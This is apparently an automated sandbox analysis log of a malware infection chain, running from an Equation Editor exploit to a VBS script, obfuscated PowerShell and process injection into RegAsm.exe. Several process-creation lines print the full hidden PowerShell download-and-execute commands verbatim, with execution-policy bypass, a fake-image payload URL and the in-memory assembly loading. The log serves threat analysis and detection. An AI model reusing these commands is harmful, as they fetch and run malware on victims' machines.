Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040BC85 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	12_2_0040BC85

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

12_2_00407C97

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 596334	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-462
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-482
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_12-49263

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_00434947 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

12_2_00434947

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

12_2_0041CA9E

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0366055F mov edx, dword ptr fs:[00000030h]		2_2_0366055F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00443214 mov eax, dword ptr fs:[00000030h]		12_2_00443214

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_0044FA8E GetProcessHeap,

12_2_0044FA8E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00434A95 SetUnhandledExceptionFilter,	12_2_00434A95
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00434947 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00434947
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0043BA62 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_0043BA62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00434F3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00434F3C

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 104.21.84.67 443			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Domain query: paste.ee

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3272, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

12_2_00412045

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_00419575 mouse_event,

12_2_00419575

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\IEneetworkinglover.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FDQW/441/57.06.59.32//:ptth' , '1' , 'C:\ProgramData\' , 'WQQ','RegAsm',''))} }"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\WQQ.vbs	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremqdgtrevdgtredudgtrendgtredgtreydgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtremwdgtre5dgtredqdgtreodgtredgtreydgtreddgtredgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtre
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links \| get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.fdqw/441/57.06.59.32//:ptth' , '1' , 'c:\programdata\' , 'wqq','regasm',''))} }"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremqdgtrevdgtredudgtrendgtredgtreydgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtremwdgtre5dgtredqdgtreodgtredgtreydgtreddgtredgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdg